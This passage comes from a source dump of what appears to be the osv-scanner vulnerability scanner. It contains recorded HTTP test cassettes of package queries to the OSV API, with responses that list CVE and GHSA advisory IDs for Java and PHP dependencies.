"CVE-2022-4304", "modified": 
"2026-03-14T11:57:20.473258Z" }, { "id": "CVE-2022-4450", "modified": "2026-03-15T14:48:08.469047Z" }, { "id": "CVE-2023-0215", "modified": "2026-03-15T22:46:35.699581Z" }, { "id": "CVE-2023-0216", "modified": "2026-03-14T14:54:02.977746Z" }, { "id": "CVE-2023-0217", "modified": "2026-03-15T22:46:23.122521Z" }, { "id": "CVE-2023-0286", "modified": "2026-03-14T11:56:55.751641Z" }, { "id": "CVE-2023-0401", "modified": "2026-03-14T12:00:52.936954Z" }, { "id": "CVE-2023-0464", "modified": "2026-03-15T22:46:00.576549Z" }, { "id": "CVE-2023-0465", "modified": "2026-03-15T22:45:58.975327Z" }, { "id": "CVE-2023-0466", "modified": "2026-03-15T22:46:04.107702Z" }, { "id": "CVE-2023-1255", "modified": "2026-03-14T12:01:08.330785Z" }, { "id": "CVE-2023-2650", "modified": "2026-03-15T22:46:51.910562Z" }, { "id": "CVE-2023-2975", "modified": "2026-03-15T14:49:55.221034Z" }, { "id": "CVE-2023-3817", "modified": "2026-03-15T22:45:38.616987Z" }, { "id": "CVE-2023-4807", "modified": "2026-03-14T12:23:37.361743Z" }, { "id": "CVE-2023-5363", "modified": "2026-03-15T22:49:01.513389Z" }, { "id": "CVE-2023-5678", "modified": "2026-03-15T22:49:18.011924Z" }, { "id": "CVE-2023-6129", "modified": "2026-03-15T21:45:17.017844Z" }, { "id": "CVE-2023-6237", "modified": "2026-03-15T22:49:35.974149Z" }, { "id": "CVE-2024-13176", "modified": "2026-03-15T22:49:27.674006Z" }, { "id": "CVE-2024-2511", "modified": "2026-03-15T22:50:31.329929Z" }, { "id": "CVE-2024-4603", "modified": "2026-03-15T13:45:23.443979Z" }, { "id": "CVE-2024-4741", "modified": "2026-03-15T22:50:47.073119Z" }, { "id": "CVE-2024-5535", "modified": "2026-03-15T22:50:00.523154Z" }, { "id": "CVE-2024-9143", "modified": "2026-03-15T22:52:44.104304Z" }, { "id": "CVE-2025-15467", "modified": "2026-03-15T22:51:41.488774Z" }, { "id": "CVE-2025-68160", "modified": "2026-03-15T22:52:16.241316Z" }, { "id": "CVE-2025-69418", "modified": "2026-03-15T22:52:15.052519Z" }, { "id": "CVE-2025-69419", "modified": "2026-03-15T22:52:23.255585Z" }, { 
"id": "CVE-2025-69420", "modified": "2026-03-15T14:54:02.448397Z" }, { "id": "CVE-2025-9230", "modified": "2026-03-15T21:45:01.944849Z" }, { "id": "CVE-2025-9232", "modified": "2026-03-15T22:22:16.665069Z" }, { "id": "CVE-2026-22795", "modified": "2026-03-15T14:55:17.107605Z" }, { "id": "CVE-2026-22796", "modified": "2026-03-15T22:54:02.133546Z" } ] } ] } headers: Content-Length: - "2593" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_HtmlFile.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_HtmlFile url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_HtmlFile_Deprecated.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_HtmlFile_Deprecated url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s 
================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_JavareachArchive.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 3196 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-core" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-kms" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-s3" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:jmespath-java" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.example:hello-tester" }, "version": "1.0-SNAPSHOT" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-annotations" }, "version": "2.6.0" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-core" }, "version": "2.14.0" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-databind" }, "version": "2.6.7.1" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.dataformat:jackson-dataformat-cbor" }, "version": "2.6.7" }, { "package": { "ecosystem": "Maven", "name": "commons-codec:commons-codec" }, "version": "1.10" }, { "package": { "ecosystem": "Maven", "name": "commons-logging:commons-logging" }, "version": "1.1.3" }, { "package": { "ecosystem": "Maven", "name": "joda-time:joda-time" }, "version": "2.8.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-lang3" }, "version": "3.12.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpclient" }, "version": "4.5.5" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpcore" }, "version": "4.4.9" }, { "package": { "ecosystem": "Maven", "name": 
"org.eclipse.jetty:jetty-continuation" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-http" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-io" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-servlets" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-util" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "software.amazon.ion:ion-java" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_JavareachArchive/jars_can_be_scanned_with_call_analysis url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 4418 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-c28r-hw5m-5gv3", "modified": "2023-11-08T04:09:28.159861Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-72hv-8253-57qq", "modified": "2026-03-04T15:06:51.908001Z" }, { "id": "GHSA-h46c-h94j-95f3", "modified": "2026-02-04T03:44:39.385253Z" } ] }, { "vulns": [ { "id": "GHSA-288c-cq4h-88gq", "modified": "2026-02-04T04:33:29.159339Z" }, { "id": "GHSA-4gq5-ch57-c2mg", "modified": "2024-03-15T05:20:21.411726Z" }, { "id": "GHSA-4w82-r329-3q67", "modified": "2024-03-16T05:18:54.922179Z" }, { "id": "GHSA-57j2-w4cx-62h2", "modified": "2026-02-04T04:26:14.546092Z" }, { "id": "GHSA-5949-rw7g-wx7w", "modified": "2025-09-15T07:42:14.888352Z" }, { "id": "GHSA-5r5r-6hpj-8gg9", "modified": "2024-02-18T05:42:28.539166Z" }, { "id": "GHSA-5ww9-j83m-q7qx", "modified": "2024-03-15T01:17:50.016820Z" }, { "id": "GHSA-645p-88qh-w398", "modified": "2024-03-16T05:19:17.936174Z" }, { "id": "GHSA-6fpp-rgj9-8rwc", "modified": "2024-03-15T05:18:54.134884Z" }, { "id": "GHSA-85cw-hj65-qqv9", "modified": "2024-03-15T05:20:15.574552Z" }, { "id": "GHSA-89qr-369f-5m5x", 
"modified": "2024-02-18T05:37:27.581808Z" }, { "id": "GHSA-8c4j-34r4-xr8g", "modified": "2024-02-18T05:31:52.762759Z" }, { "id": "GHSA-8w26-6f25-cm9x", "modified": "2024-02-18T05:30:48.085017Z" }, { "id": "GHSA-9gph-22xh-8x98", "modified": "2024-02-18T05:33:27.617261Z" }, { "id": "GHSA-9m6f-7xcq-8vf8", "modified": "2024-02-18T05:32:25.400029Z" }, { "id": "GHSA-c8hm-7hpq-7jhg", "modified": "2024-03-15T01:17:19.251183Z" }, { "id": "GHSA-cf6r-3wgc-h863", "modified": "2024-02-18T05:32:56.325249Z" }, { "id": "GHSA-cggj-fvv3-cqwv", "modified": "2024-03-15T01:18:46.938616Z" }, { "id": "GHSA-cjjf-94ff-43w7", "modified": "2024-03-11T05:19:23.395848Z" }, { "id": "GHSA-cmfg-87vq-g5g4", "modified": "2024-03-15T01:18:17.903231Z" }, { "id": "GHSA-cvm9-fjm9-3572", "modified": "2024-02-18T05:25:36.165759Z" }, { "id": "GHSA-f3j5-rmmp-3fc5", "modified": "2024-03-15T05:20:35.120151Z" }, { "id": "GHSA-f9xh-2qgp-cq57", "modified": "2024-02-18T05:32:05.421673Z" }, { "id": "GHSA-fmmc-742q-jg75", "modified": "2024-03-16T05:19:55.172981Z" }, { "id": "GHSA-fqwf-pjwf-7vqv", "modified": "2024-07-03T21:22:37.578162Z" }, { "id": "GHSA-gjmw-vf9h-g25v", "modified": "2024-03-16T05:19:37.211801Z" }, { "id": "GHSA-gwp4-hfv6-p7hw", "modified": "2024-03-13T05:27:58.436849Z" }, { "id": "GHSA-gww7-p5w4-wrfv", "modified": "2024-03-15T01:05:18.790961Z" }, { "id": "GHSA-h3cw-g4mq-c5x2", "modified": "2024-02-18T05:30:45.329621Z" }, { "id": "GHSA-h592-38cm-4ggp", "modified": "2024-03-15T01:16:50.905794Z" }, { "id": "GHSA-h822-r4r5-v8jg", "modified": "2026-02-04T02:19:17.186100Z" }, { "id": "GHSA-jjjh-jjxp-wpff", "modified": "2026-02-04T02:23:59.070528Z" }, { "id": "GHSA-m6x4-97wx-4q27", "modified": "2024-02-18T05:21:54.725837Z" }, { "id": "GHSA-mph4-vhrx-mv67", "modified": "2024-03-15T01:16:21.467932Z" }, { "id": "GHSA-mx7p-6679-8g3q", "modified": "2024-03-15T01:01:46.432481Z" }, { "id": "GHSA-p43x-xfjf-5jhr", "modified": "2024-03-15T00:33:14.700288Z" }, { "id": "GHSA-q93h-jc49-78gg", "modified": 
"2024-03-16T05:19:47.711015Z" }, { "id": "GHSA-qjw2-hr98-qgfh", "modified": "2024-02-18T05:20:56.894470Z" }, { "id": "GHSA-qr7j-h6gg-jmgc", "modified": "2024-03-11T05:21:14.313980Z" }, { "id": "GHSA-r3gr-cxrf-hg25", "modified": "2024-06-25T14:20:21.323050Z" }, { "id": "GHSA-r695-7vr9-jgc2", "modified": "2024-02-18T05:30:45.856594Z" }, { "id": "GHSA-rfx6-vp9g-rh7v", "modified": "2024-03-11T05:17:47.425595Z" }, { "id": "GHSA-rgv9-q543-rqg4", "modified": "2026-02-04T02:40:22.352009Z" }, { "id": "GHSA-rpr3-cw39-3pxh", "modified": "2026-03-13T22:01:03.241551Z" }, { "id": "GHSA-v585-23hc-c647", "modified": "2024-02-18T05:22:38.024460Z" }, { "id": "GHSA-vfqx-33qm-g869", "modified": "2024-02-18T05:24:26.785781Z" }, { "id": "GHSA-w3f4-3q6j-rh82", "modified": "2024-03-11T05:18:22.727055Z" }, { "id": "GHSA-wh8g-3j2c-rqj5", "modified": "2024-03-15T00:31:15.123603Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-j288-q9x7-2f5v", "modified": "2026-02-04T03:18:02.851501Z" } ] }, { "vulns": [ { "id": "GHSA-7r82-7xv7-xcpj", "modified": "2026-02-04T02:20:49.137443Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-cj7v-27pg-wf7q", "modified": "2026-03-13T22:01:09.359414Z" }, { "id": "GHSA-hmr7-m48g-48f6", "modified": "2026-02-04T03:59:52.327364Z" }, { "id": "GHSA-qh8g-58pp-2wxh", "modified": "2026-02-04T05:13:21.910792Z" }, { "id": "GHSA-wjpw-4j6x-6rwh", "modified": "2026-03-09T11:29:07.402944Z" } ] }, {}, { "vulns": [ { "id": "GHSA-3gh6-v5v9-6v9j", "modified": "2026-02-04T03:12:16.534413Z" }, { "id": "GHSA-gwcr-j4wh-j3cq", "modified": "2026-03-13T21:59:32.515061Z" }, { "id": "GHSA-j26w-f9rq-mr2q", "modified": "2026-02-04T03:32:43.162423Z" } ] }, {}, { "vulns": [ { "id": "GHSA-264p-99wq-f4j6", "modified": "2026-02-04T03:21:48.913313Z" } ] } ] } headers: Content-Length: - "4418" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 3196 host: api.osv.dev body: | { "queries": [ { "package": { 
"ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-core" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-kms" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-s3" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:jmespath-java" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.example:hello-tester" }, "version": "1.0-SNAPSHOT" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-annotations" }, "version": "2.6.0" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-core" }, "version": "2.14.0" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-databind" }, "version": "2.6.7.1" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.dataformat:jackson-dataformat-cbor" }, "version": "2.6.7" }, { "package": { "ecosystem": "Maven", "name": "commons-codec:commons-codec" }, "version": "1.10" }, { "package": { "ecosystem": "Maven", "name": "commons-logging:commons-logging" }, "version": "1.1.3" }, { "package": { "ecosystem": "Maven", "name": "joda-time:joda-time" }, "version": "2.8.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-lang3" }, "version": "3.12.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpclient" }, "version": "4.5.5" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpcore" }, "version": "4.4.9" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-continuation" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-http" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-io" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": 
"org.eclipse.jetty:jetty-servlets" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-util" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "software.amazon.ion:ion-java" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_JavareachArchive/jars_can_be_scanned_with_call_analysis_and_disabled_enricher url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 4418 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-c28r-hw5m-5gv3", "modified": "2023-11-08T04:09:28.159861Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-72hv-8253-57qq", "modified": "2026-03-04T15:06:51.908001Z" }, { "id": "GHSA-h46c-h94j-95f3", "modified": "2026-02-04T03:44:39.385253Z" } ] }, { "vulns": [ { "id": "GHSA-288c-cq4h-88gq", "modified": "2026-02-04T04:33:29.159339Z" }, { "id": "GHSA-4gq5-ch57-c2mg", "modified": "2024-03-15T05:20:21.411726Z" }, { "id": "GHSA-4w82-r329-3q67", "modified": "2024-03-16T05:18:54.922179Z" }, { "id": "GHSA-57j2-w4cx-62h2", "modified": "2026-02-04T04:26:14.546092Z" }, { "id": "GHSA-5949-rw7g-wx7w", "modified": "2025-09-15T07:42:14.888352Z" }, { "id": "GHSA-5r5r-6hpj-8gg9", "modified": "2024-02-18T05:42:28.539166Z" }, { "id": "GHSA-5ww9-j83m-q7qx", "modified": "2024-03-15T01:17:50.016820Z" }, { "id": "GHSA-645p-88qh-w398", "modified": "2024-03-16T05:19:17.936174Z" }, { "id": "GHSA-6fpp-rgj9-8rwc", "modified": "2024-03-15T05:18:54.134884Z" }, { "id": "GHSA-85cw-hj65-qqv9", "modified": "2024-03-15T05:20:15.574552Z" }, { "id": "GHSA-89qr-369f-5m5x", "modified": "2024-02-18T05:37:27.581808Z" }, { "id": "GHSA-8c4j-34r4-xr8g", "modified": "2024-02-18T05:31:52.762759Z" }, { "id": "GHSA-8w26-6f25-cm9x", "modified": "2024-02-18T05:30:48.085017Z" }, { "id": "GHSA-9gph-22xh-8x98", "modified": "2024-02-18T05:33:27.617261Z" }, { "id": "GHSA-9m6f-7xcq-8vf8", "modified": 
"2024-02-18T05:32:25.400029Z" }, { "id": "GHSA-c8hm-7hpq-7jhg", "modified": "2024-03-15T01:17:19.251183Z" }, { "id": "GHSA-cf6r-3wgc-h863", "modified": "2024-02-18T05:32:56.325249Z" }, { "id": "GHSA-cggj-fvv3-cqwv", "modified": "2024-03-15T01:18:46.938616Z" }, { "id": "GHSA-cjjf-94ff-43w7", "modified": "2024-03-11T05:19:23.395848Z" }, { "id": "GHSA-cmfg-87vq-g5g4", "modified": "2024-03-15T01:18:17.903231Z" }, { "id": "GHSA-cvm9-fjm9-3572", "modified": "2024-02-18T05:25:36.165759Z" }, { "id": "GHSA-f3j5-rmmp-3fc5", "modified": "2024-03-15T05:20:35.120151Z" }, { "id": "GHSA-f9xh-2qgp-cq57", "modified": "2024-02-18T05:32:05.421673Z" }, { "id": "GHSA-fmmc-742q-jg75", "modified": "2024-03-16T05:19:55.172981Z" }, { "id": "GHSA-fqwf-pjwf-7vqv", "modified": "2024-07-03T21:22:37.578162Z" }, { "id": "GHSA-gjmw-vf9h-g25v", "modified": "2024-03-16T05:19:37.211801Z" }, { "id": "GHSA-gwp4-hfv6-p7hw", "modified": "2024-03-13T05:27:58.436849Z" }, { "id": "GHSA-gww7-p5w4-wrfv", "modified": "2024-03-15T01:05:18.790961Z" }, { "id": "GHSA-h3cw-g4mq-c5x2", "modified": "2024-02-18T05:30:45.329621Z" }, { "id": "GHSA-h592-38cm-4ggp", "modified": "2024-03-15T01:16:50.905794Z" }, { "id": "GHSA-h822-r4r5-v8jg", "modified": "2026-02-04T02:19:17.186100Z" }, { "id": "GHSA-jjjh-jjxp-wpff", "modified": "2026-02-04T02:23:59.070528Z" }, { "id": "GHSA-m6x4-97wx-4q27", "modified": "2024-02-18T05:21:54.725837Z" }, { "id": "GHSA-mph4-vhrx-mv67", "modified": "2024-03-15T01:16:21.467932Z" }, { "id": "GHSA-mx7p-6679-8g3q", "modified": "2024-03-15T01:01:46.432481Z" }, { "id": "GHSA-p43x-xfjf-5jhr", "modified": "2024-03-15T00:33:14.700288Z" }, { "id": "GHSA-q93h-jc49-78gg", "modified": "2024-03-16T05:19:47.711015Z" }, { "id": "GHSA-qjw2-hr98-qgfh", "modified": "2024-02-18T05:20:56.894470Z" }, { "id": "GHSA-qr7j-h6gg-jmgc", "modified": "2024-03-11T05:21:14.313980Z" }, { "id": "GHSA-r3gr-cxrf-hg25", "modified": "2024-06-25T14:20:21.323050Z" }, { "id": "GHSA-r695-7vr9-jgc2", "modified": 
"2024-02-18T05:30:45.856594Z" }, { "id": "GHSA-rfx6-vp9g-rh7v", "modified": "2024-03-11T05:17:47.425595Z" }, { "id": "GHSA-rgv9-q543-rqg4", "modified": "2026-02-04T02:40:22.352009Z" }, { "id": "GHSA-rpr3-cw39-3pxh", "modified": "2026-03-13T22:01:03.241551Z" }, { "id": "GHSA-v585-23hc-c647", "modified": "2024-02-18T05:22:38.024460Z" }, { "id": "GHSA-vfqx-33qm-g869", "modified": "2024-02-18T05:24:26.785781Z" }, { "id": "GHSA-w3f4-3q6j-rh82", "modified": "2024-03-11T05:18:22.727055Z" }, { "id": "GHSA-wh8g-3j2c-rqj5", "modified": "2024-03-15T00:31:15.123603Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-j288-q9x7-2f5v", "modified": "2026-02-04T03:18:02.851501Z" } ] }, { "vulns": [ { "id": "GHSA-7r82-7xv7-xcpj", "modified": "2026-02-04T02:20:49.137443Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-cj7v-27pg-wf7q", "modified": "2026-03-13T22:01:09.359414Z" }, { "id": "GHSA-hmr7-m48g-48f6", "modified": "2026-02-04T03:59:52.327364Z" }, { "id": "GHSA-qh8g-58pp-2wxh", "modified": "2026-02-04T05:13:21.910792Z" }, { "id": "GHSA-wjpw-4j6x-6rwh", "modified": "2026-03-09T11:29:07.402944Z" } ] }, {}, { "vulns": [ { "id": "GHSA-3gh6-v5v9-6v9j", "modified": "2026-02-04T03:12:16.534413Z" }, { "id": "GHSA-gwcr-j4wh-j3cq", "modified": "2026-03-13T21:59:32.515061Z" }, { "id": "GHSA-j26w-f9rq-mr2q", "modified": "2026-02-04T03:32:43.162423Z" } ] }, {}, { "vulns": [ { "id": "GHSA-264p-99wq-f4j6", "modified": "2026-02-04T03:21:48.913313Z" } ] } ] } headers: Content-Length: - "4418" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 3196 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-core" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-kms" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.amazonaws:aws-java-sdk-s3" }, "version": "1.11.327" }, { 
"package": { "ecosystem": "Maven", "name": "com.amazonaws:jmespath-java" }, "version": "1.11.327" }, { "package": { "ecosystem": "Maven", "name": "com.example:hello-tester" }, "version": "1.0-SNAPSHOT" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-annotations" }, "version": "2.6.0" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-core" }, "version": "2.14.0" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-databind" }, "version": "2.6.7.1" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.dataformat:jackson-dataformat-cbor" }, "version": "2.6.7" }, { "package": { "ecosystem": "Maven", "name": "commons-codec:commons-codec" }, "version": "1.10" }, { "package": { "ecosystem": "Maven", "name": "commons-logging:commons-logging" }, "version": "1.1.3" }, { "package": { "ecosystem": "Maven", "name": "joda-time:joda-time" }, "version": "2.8.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-lang3" }, "version": "3.12.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpclient" }, "version": "4.5.5" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpcore" }, "version": "4.4.9" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-continuation" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-http" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-io" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-servlets" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-util" }, "version": "9.4.40.v20210413" }, { "package": { "ecosystem": "Maven", "name": "software.amazon.ion:ion-java" }, "version": "1.0.2" } ] } headers: Content-Type: - 
application/json X-Test-Name: - TestCommand_JavareachArchive/jars_can_be_scanned_without_call_analysis url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 4418 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-c28r-hw5m-5gv3", "modified": "2023-11-08T04:09:28.159861Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-72hv-8253-57qq", "modified": "2026-03-04T15:06:51.908001Z" }, { "id": "GHSA-h46c-h94j-95f3", "modified": "2026-02-04T03:44:39.385253Z" } ] }, { "vulns": [ { "id": "GHSA-288c-cq4h-88gq", "modified": "2026-02-04T04:33:29.159339Z" }, { "id": "GHSA-4gq5-ch57-c2mg", "modified": "2024-03-15T05:20:21.411726Z" }, { "id": "GHSA-4w82-r329-3q67", "modified": "2024-03-16T05:18:54.922179Z" }, { "id": "GHSA-57j2-w4cx-62h2", "modified": "2026-02-04T04:26:14.546092Z" }, { "id": "GHSA-5949-rw7g-wx7w", "modified": "2025-09-15T07:42:14.888352Z" }, { "id": "GHSA-5r5r-6hpj-8gg9", "modified": "2024-02-18T05:42:28.539166Z" }, { "id": "GHSA-5ww9-j83m-q7qx", "modified": "2024-03-15T01:17:50.016820Z" }, { "id": "GHSA-645p-88qh-w398", "modified": "2024-03-16T05:19:17.936174Z" }, { "id": "GHSA-6fpp-rgj9-8rwc", "modified": "2024-03-15T05:18:54.134884Z" }, { "id": "GHSA-85cw-hj65-qqv9", "modified": "2024-03-15T05:20:15.574552Z" }, { "id": "GHSA-89qr-369f-5m5x", "modified": "2024-02-18T05:37:27.581808Z" }, { "id": "GHSA-8c4j-34r4-xr8g", "modified": "2024-02-18T05:31:52.762759Z" }, { "id": "GHSA-8w26-6f25-cm9x", "modified": "2024-02-18T05:30:48.085017Z" }, { "id": "GHSA-9gph-22xh-8x98", "modified": "2024-02-18T05:33:27.617261Z" }, { "id": "GHSA-9m6f-7xcq-8vf8", "modified": "2024-02-18T05:32:25.400029Z" }, { "id": "GHSA-c8hm-7hpq-7jhg", "modified": "2024-03-15T01:17:19.251183Z" }, { "id": "GHSA-cf6r-3wgc-h863", "modified": "2024-02-18T05:32:56.325249Z" }, { "id": "GHSA-cggj-fvv3-cqwv", "modified": "2024-03-15T01:18:46.938616Z" }, { "id": "GHSA-cjjf-94ff-43w7", "modified": "2024-03-11T05:19:23.395848Z" }, { 
"id": "GHSA-cmfg-87vq-g5g4", "modified": "2024-03-15T01:18:17.903231Z" }, { "id": "GHSA-cvm9-fjm9-3572", "modified": "2024-02-18T05:25:36.165759Z" }, { "id": "GHSA-f3j5-rmmp-3fc5", "modified": "2024-03-15T05:20:35.120151Z" }, { "id": "GHSA-f9xh-2qgp-cq57", "modified": "2024-02-18T05:32:05.421673Z" }, { "id": "GHSA-fmmc-742q-jg75", "modified": "2024-03-16T05:19:55.172981Z" }, { "id": "GHSA-fqwf-pjwf-7vqv", "modified": "2024-07-03T21:22:37.578162Z" }, { "id": "GHSA-gjmw-vf9h-g25v", "modified": "2024-03-16T05:19:37.211801Z" }, { "id": "GHSA-gwp4-hfv6-p7hw", "modified": "2024-03-13T05:27:58.436849Z" }, { "id": "GHSA-gww7-p5w4-wrfv", "modified": "2024-03-15T01:05:18.790961Z" }, { "id": "GHSA-h3cw-g4mq-c5x2", "modified": "2024-02-18T05:30:45.329621Z" }, { "id": "GHSA-h592-38cm-4ggp", "modified": "2024-03-15T01:16:50.905794Z" }, { "id": "GHSA-h822-r4r5-v8jg", "modified": "2026-02-04T02:19:17.186100Z" }, { "id": "GHSA-jjjh-jjxp-wpff", "modified": "2026-02-04T02:23:59.070528Z" }, { "id": "GHSA-m6x4-97wx-4q27", "modified": "2024-02-18T05:21:54.725837Z" }, { "id": "GHSA-mph4-vhrx-mv67", "modified": "2024-03-15T01:16:21.467932Z" }, { "id": "GHSA-mx7p-6679-8g3q", "modified": "2024-03-15T01:01:46.432481Z" }, { "id": "GHSA-p43x-xfjf-5jhr", "modified": "2024-03-15T00:33:14.700288Z" }, { "id": "GHSA-q93h-jc49-78gg", "modified": "2024-03-16T05:19:47.711015Z" }, { "id": "GHSA-qjw2-hr98-qgfh", "modified": "2024-02-18T05:20:56.894470Z" }, { "id": "GHSA-qr7j-h6gg-jmgc", "modified": "2024-03-11T05:21:14.313980Z" }, { "id": "GHSA-r3gr-cxrf-hg25", "modified": "2024-06-25T14:20:21.323050Z" }, { "id": "GHSA-r695-7vr9-jgc2", "modified": "2024-02-18T05:30:45.856594Z" }, { "id": "GHSA-rfx6-vp9g-rh7v", "modified": "2024-03-11T05:17:47.425595Z" }, { "id": "GHSA-rgv9-q543-rqg4", "modified": "2026-02-04T02:40:22.352009Z" }, { "id": "GHSA-rpr3-cw39-3pxh", "modified": "2026-03-13T22:01:03.241551Z" }, { "id": "GHSA-v585-23hc-c647", "modified": "2024-02-18T05:22:38.024460Z" }, { "id": 
